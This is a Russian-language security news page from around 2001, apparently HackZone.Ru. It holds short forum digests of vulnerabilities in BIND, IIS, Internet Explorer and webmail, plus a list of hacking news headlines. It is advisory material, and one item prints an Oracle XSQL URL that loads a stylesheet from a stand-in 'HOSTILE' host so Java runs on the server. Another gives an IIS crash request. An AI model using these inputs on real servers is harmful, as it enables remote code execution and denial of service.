|
|
Security Page
Статьи
Поиметь, или... поиметь два раза? 07/12/99
Проблемы CGI на Perl 10/11/99
Шпионские штучки 06/10/99
Безопасность компьютерных систем на базе Windows NT 01/09/99
Сруби бабки в сети! 15/08/99
Вирусы 05/08/99
Переполнение буфера win32: беспредел 31/07/99
Как смотреть НТВ+ 15/07/99
И снова кардинг. Российский опыт 5/07/99
Еще раз о настоящих программистах 29/06/99
|
RSL
>
Серьёзная уязвимость в BIND. /HackZone.Ru/RSN Forum 31.01.2001 02:45:05/:
CERT опубликованны два переполнения буфера и "ошибка форматной строки" в BIND 4 и 8, позволяющие захватить контроль над DNS -сервером. Практически это может привести к неработоспособности значительной части Интернета. FreeBSD и практически все производители коммерческих версий Linux уже объявили о патчах для BIND, но многие ли ими воспользуются?
|
>
>
Серьёзные уязвимости популярных сервисов /HackZone.Ru/RSN Forum 27.01.2001 00:04:12/:
Новости RSN форума Новая ошибка в популярных WWW-почты использующих таблицы стилей (Hotmail, ZDNet). Специально сформированное письмо может с переопределить служебные кнобки в Web-итерфейсе. (2 сообщения: 24/1- Ben Li , 26/1- Gregory Duchemin) Переполнение буфера в Netscape Communicator 6. (1- Anders Ingebornlt) AOL Instnat Messenger позволяет выполнить скрипты под видом картинок (1 - Dont Know Guilt )
Ведщий форума A. V. Komlin
|
>
Рождественский набор ошибок от Микрософт. /HackZone.Ru/RSN Forum 17.01.2001 04:09:35/:
1.IIS рушится, получив запрос вида GET /%0%0 HTTP/1.0 - NtWaK0 2.Переполнение стека в программах использующих MSHTML.DLL (IE, Outlook) - Thor Larholm 3. Уязвимость в IE+WMP позволяет загрузить в роли WMP skin апплет (.jar), и получить доступ к диску по чтению. - Guninski 4. Web Client позволяет перехватить NTLM-хэш пользователя- Ben Greenbaum С уважением, ведущий RSN форума - A.V. Komlin
|
>
>
Oracle 8.1.7 позволяет несанкционированно исполнять удалённые сервлеты. /HackZone.Ru/RSN Forum 10.01.2001 13:18:51/:
Oracle XSQL servlet позволяет несанкционированно исполнять удалённые сервлеты. Это происходит 1) из-за возможности указывать внешние таблицы стилей
http://XSQL-SERVER/EXISTING.xsql?xml-stylesheet=http://HOSTILE/ora.xsl
2) возможности вставлять в последние объекты java.
<xsl:xmlns:jstr="http://www.oracle.com/XSL/Transform/java/java.lang.String" version="1.0"> ... <xsl:variable name="str1" select="jstr:new('java on the server')" /> ...
|
>
MindResourses 2001 /dl 10.01.2001 03:08:42/:
3-4 февраля в Москве пройдет demoparty MindResourses 2001. Оно обещает быть одним из крупнейших событий на российской демосцене за последние два года. О своем участии уже заявили такие известные группы как Proxium, T-Rex, Hrg, Accept Core, Energy, WRC, Hbg. Ожидаются и новые лица, приглашаются все желающие, гарантируются реальные призы и подарки.
|
>
>
|
|
|
Новости
Арестован один из хакеров, укравших номера кредиток Гейтса и Арафата 23/02/01
Хакеров впервые официально приравняли к террористам 20/02/01
Питерские подростки терроризовали школу через Интернет 19/02/01
Хакер получит работу благодаря "Анне Курниковой" 17/02/01
Jxta: секретное оружие Sun против Microsoft 16/02/01
Ответственность за гвирус Курниковойё взял на себя нидерландец 14/02/01
Создатель "Анны Курниковой" хотел как лучше 14/02/01
Под видом Курниковой 13/02/01
Эксперт Hackzone: все бесплатные российские почтовые серверы легко можно взломать 13/02/01
Вирус Курниковой покоряет интернет 13/02/01
Вирус "Анна Курникова" разбушевался в Австралии 13/02/01
Хакеры взломали сайт Центра управления полетами 12/02/01
В Сети появилась обновляемая карта распространения компьютерных вирусов 08/02/01
гЖучокё позволяет читать чужие электронные письма 06/02/01
Проблема: Интернет в школах 05/02/01
Всемирный экономический форум пострадал от хакеров 05/02/01
Хакеры украли номера кредиток Билла Гейтса, Ясира Арафата, Шимона Переса и Кофи Аннана 05/02/01
Пять украинских программистов научились произвольно менять номера ICQ 03/02/01
NSA конструирует компьютер со встроенным сейфом 02/02/01
ПО защищает пользователей мобильных телефонов от мошенников 02/02/01
"Лаборатория Касперского" на 5 лет защитит ЦБ от вирусов 01/02/01
В столице Белоруссии задержали 26 хакеров 01/02/01
Хакеры взломали сайт Шарона и украли базу данных 31/01/01
Cпутниковое телевидение устроило тысячам взломщиков "черное воскресенье" 31/01/01
CERT предупреждает об уязвимости интернет-ПО 31/01/01
Microsoft расследует предательские публикации кода IE 6 30/01/01
Побочный эффект ускорения 30/01/01
"Дыра" в программе BIND может привести к неработоспособности всего Интернета 30/01/01
Хакерам не понравилось выступление Папы Римского, и они взломали его сайт 26/01/01
Веб-бандиты заблокировали доступ к сайтам Microsoft 26/01/01
|
|
|
|